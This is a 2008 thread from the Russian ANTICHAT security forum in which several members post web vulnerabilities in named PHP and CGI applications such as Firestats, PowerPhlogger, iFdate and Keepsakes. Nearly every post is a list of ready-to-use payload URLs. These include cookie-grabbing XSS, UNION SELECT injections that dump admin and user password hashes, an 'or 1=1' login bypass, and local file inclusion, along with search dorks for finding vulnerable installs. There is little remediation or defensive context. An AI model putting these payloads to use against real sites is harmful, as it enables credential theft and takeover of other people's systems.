HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 25.06.2008, 20:16
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Статистика/счётчик Firestats 1.4.4-stable:

XSS:
Код:
http://site/stats/php/window-delete-site.php?site_id=')"><script>alert(/XSS/)</script>
http://site/stats/php/window-new-edit-site.php?site_id="><script>alert(/XSS/)</script>
http://site/stats/lib/ip2c/test-ip.php?ip=<script>alert(/XSS/)</script>
Возможность узнать префикс БД, имя пользователя БД и хост:
Код:
http://site/stats/php/page-database.php
http://site/stats/tools.php?file_id=system_test (только префикс)
Если админ криворукий, можно добавить новго админа тут:
Код:
http://site/stats/tools.php?file_id=manage_users
Узнать мыло админа и юзеров (не баг, но поидее этого не должно быть):
Код:
http://site/stats/php/page-users.php
http://site/stats/php/window-edit-user.php?user_id=1
Раскрытие пути:
Код:
stats/integration/mediawiki/firestats-mediawiki.php
stats/php/tabbed-pane.php
stats/php/tools-menu.php
stats/firestats-wordpress.php
stats/php/ip2country.php
stats/php/footer.php
status.php
stats/php/page-stats.php
stats/login.php
stats/php/page-add-admin.php
stats/firestats-gregarius.php
stats/lib/ip2c/benchmark.php
stats/lib/ezsql/mysql/ez_sql_mysql.php
З.Ы.
Папка со статистикой может называться и не stats. Багов больше, толком не рылся, это то, что сразу на глаза попалось.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 26.06.2008 в 12:43..
 
Ответить с цитированием

PowerPhlogger 2.2.5
  #2  
Старый 04.08.2008, 22:28
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию PowerPhlogger 2.2.5

Уязвимости выкладываю в порядке мною нахождения ихВсе проверялись на версии 2.2.5
XSS:
Post-запрос на странице http://site/dspLogs.php
Код:
"><script>alert(document.cookie)</script>
В полях: Host, Referrer, Agent Information, res, colo, online, mp

XSS:
Код:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Также нашел интересные мета-теги:
Код:
<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />
Странная ксс:
На странице http://site/dspStats.php?edit=mp в логах посещений фильтруется информация про страницы сайта,если счетчик установленный на индексной странице то можно указать код в качестве адреса страницы)
Код:
http:/site/<script>alert(document.cookie)</script>
Вобщем так

Код:
http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

Код:
http://site/include/edCss.inc.php

http://site/include/foot.inc.php

http://site/include/get_csscolors.inc.php

http://site/include/head.inc.php

http://site/include/head_stuff.inc.php

http://site/include/loglist.inc.php

http://site/include/pphlogger_send.inc.php

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/edit_user.php

http://site/main-dummy.php

http://site/main.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

http://site/modules/usercreate.php

Еще XSS(найденые мною давно):


Post запрос на странице http://site/edUserprofile.php (возможны как Get так и Post запросы)

Код:
</textarea><script>alert(document.cookie)</script>
В параметре N_your_url

Код:
"><script>alert(document.cookie)</script>
В параметрe N_email

Код:
"><script src=http://site.com
В параметрах N_fg_c, N_bg_c (ограничение в 30 символов)

XSS:

Код:
http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit
SQL Injection:
Код:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
DoS:

http://site/newaccount_self.php

Скрипт редеректит сам себя.Mozilla автомаматический останавливает процесс,а вот ИЕ-нет.Поэтому если клиент,который обращается к скрипту сам не остановит редирект(например какой-то бот поисковых систем) то создается большая нагрузка на сервер.

Information Leakage:

http://site/main_location.inc

XSS:

Код:
http://site/dspLogs.php/%22%3E%3Cscript%20src=script.js%20
Код:
http://site/dspStats.php/%22%3E%3Cscript%20src=script.js%20
Код:
http://site/edCss.php/%22%3E%3Cscript%20src=script.js%20
Данные ксс возможны в связи с использованием в скриптах $PHP_SELF.
 
Ответить с цитированием

Scuttle
  #3  
Старый 05.08.2008, 17:12
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию Scuttle

XSS:
Код:
http://site/bookmarks/%3CBODY%20onload=alert(document.cookie)%3E
Код:
http://site/?sort=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Вводим в поиске следующий пост запрос
Код:
</textarea><script>alert(document.cookie)</script>
Local File Inclusion:
Код:
http://site.com/help/syntax.html?la=/../query
 
Ответить с цитированием

Boundless Source
  #4  
Старый 11.08.2008, 14:27
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию Boundless Source

XSS:

Код:
http://site/catalog/index.cgi?search=%3Cscript%3Ealert(document.cookie)%3C/script%3E&sparam=all&category=cat20
Код:
http://site/catalog/add-lnk.cgi?cmd=sendpassword&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/catalog/add-lnk.cgi?cmd=edit&id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/catalog/admin.cgi?cmd=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Активка:
На странице http://site/catalog/add-lnk.cgi?cmd=showform пишем
Код:
<BODY onload=alert(document.cookie)
В полях: Название ресурса, URL, Регион, Описание сайта.
 
Ответить с цитированием

RotaBanner
  #5  
Старый 11.08.2008, 18:46
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию RotaBanner

XSS:

Код:
http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Ответить с цитированием

W-Agora
  #6  
Старый 12.08.2008, 01:35
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию W-Agora

XSS:
Код:
http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/static/list.php?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginpassword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&redirect_url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&editsite=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&userid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL:
Код:
http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=xxxxxxxxxx

Full path disclosure:


http://site/static/list.php?key=-1102352364
 
Ответить с цитированием

PRO-search
  #7  
Старый 13.08.2008, 01:24
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию PRO-search

XSS:
Уязвимости в параметрах prot, host, path, name, ext, size, search_days, show_page

Код:
http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Код:
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 
Ответить с цитированием

  #8  
Старый 25.08.2008, 22:57
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Web Directory Script <= 2.0 (name) SQL Injection Vulnerability

magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

Код:
listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*
http://milw0rm.com/exploits/6298

Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities

magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

Код:
index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
Код:
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
Dork:

made by matterdaddy

http://milw0rm.com/exploits/6297

(c)~!Dok_tOR!~
 
Ответить с цитированием

  #9  
Старый 26.08.2008, 19:21
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

iFdate <= 2.0.3 Remote SQL Injection Vulnerability

Condition: magic_quotes_gpc = Off

http://localhost/[installdir]/members_search.php

Search Name/Nickname

Exploit 1:

Код:
' union select 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_admins/*
Exploit 2:

Код:
' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/*
http://milw0rm.com/exploits/6315
(c) ~!Dok_tOR!~
 
Ответить с цитированием

  #10  
Старый 12.09.2008, 19:09
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

Battle Scrypt SQL Injection

Author: ~!Dok_tOR!~
Date found: 26.08.08
Product: Battle Scrypt
Download script: _http://rapidshare.com/files/114200827/BattleScrypt_PHP_NULLIFIED.rar.html
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Код:
http://localhost/[installdir]/search.php
Model Name:

Exploit:

Код:
' union select 1,user(),3/*
Код:
http://localhost/[installdir]/stats.php?id=' union select 1,2,3,4,5,6,7,8,9,10,11/*

Big Fat Rate My Photo AdSense Website SQL Injection

Author: ~!Dok_tOR!~
Date found: 29.08.08
Product: Big Fat Rate My Photo AdSense Website
Price: $14.99
URL: www.dotcomallsorts.com
Download script: _http://89.223.37.140/files/scripter/Big%20Fat%20Rate%20My%20Photo%20AdSense%20Website. rar
Vulnerability Class: SQL Injection

Exploit 1:

Код:
http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+admin/*
Exploit 2:

Код:
http://localhost/[installdir]/viewcomments.php?phid=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+members/*
Admin panel:

Код:
http://localhost/[installdir]/admin/

Article Publisher Pro <= v1.5 SQL Injection

Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: Article Publisher Pro v1.5
Price: $75
URL: www.phparticlescript.com
Vulnerability Class: SQL Injection

Exploit 1:

Код:
http://localhost/[installdir]/articles.php?art_id=1+union+select+1,2,concat_ws(0x3a,aut_username,aut_password),4,5,6,7+from+flaxweb_authors+where+aut_id=1/*
Exploit 2:

Код:
http://localhost/[installdir]/userarticles.php?aut_id=-1+union+select+1,concat_ws(0x3a,aut_username,aut_password),3,4,5,6,7,8,9,10,11+from+flaxweb_authors+where+aut_id=1/*
Dork:

All rights reserverd © Your Articles Pro 2002-2005
Copyright 2006 - 2008, Article Publisher PRO v1.5


Keepsakes SQL Injection

Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: Keepsakes
Price: $25
URL: harlandscripts.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

Код:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+admin_sign/*
Opera -> Source(Ctrl+F3)

Exploit 2:

Код:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+members/*
Opera -> Source(Ctrl+F3)

Exploit 3:

Код:
http://localhost/[installdir]/details.php?user=-1'+union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+affiiiates/*
Opera -> Source(Ctrl+F3)

Exploit 4:

Код:
http://localhost/[installdir]/showtime.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
Exploit 5:

Код:
http://localhost/[installdir]/showtime_noborder.php?pid=-1'+union+select+1,2,3,user(),5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+from+admin_sign/*
Admin panel:

Код:
http://localhost/[installdir]/admin/
Dork:

Copyright Your Keepsakes ® ™ 2007


Smart Traffic 6 in 1 SQL Injection

Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: Smart Traffic 6 in 1
Download script: _http://rapidshare.com/files/139785932/smarttraffic.rar
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit:

Код:
http://localhost/[installdir]/inc.groups.php?pid=-1%27+union+select+1,2,concat_ws(0x3a,login,pswd,email)+from+members/*

TopCoolive SQL Injection

Author: ~!Dok_tOR!~
Date found: 30.08.08
Product: TopCoolive
URL: www.vetton.ru
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

Код:
http://localhost/[installdir]/stats.php?id='+union+select+1,user(),password,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
Exploit 2:

Код:
http://localhost/[installdir]/stat_res.php?id='+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+new/*
Exploit 3:

Код:
http://localhost/[installdir]/img.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,password,30,31,32,33,34+from+new/*

Warez Script (by Mikel Dean) SQL Injection

Author: ~!Dok_tOR!~
Date found: 27.08.08
Product: Warez Script
Download script: _http://rapidshare.com/files/98446563/Warez_Script_English_by_Mikel_Dean.rar
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

Код:
http://localhost/[installdir]/v2/index.php?section=download&id='+union+select+1,2,3,4,concat_ws(0x3a,username,password)+from+ddl_users/*
Exploit 2:

Код:
http://localhost/[installdir]/v2/index.php?section=list&subcat='+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+ddl_users/*
Код:
http://localhost/[installdir]/v2/index.php?section=post_upload&cat='+union+select+1,2,3,4/*
Admin Authentication Bypass

Код:
http://localhost/[installdir]/v2/login.php
User: 1' or 1=1/*
Pass: 1' or 1=1/*

(c) ~!Dok_tOR!~

Последний раз редактировалось ~!DoK_tOR!~; 19.09.2008 в 15:30..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ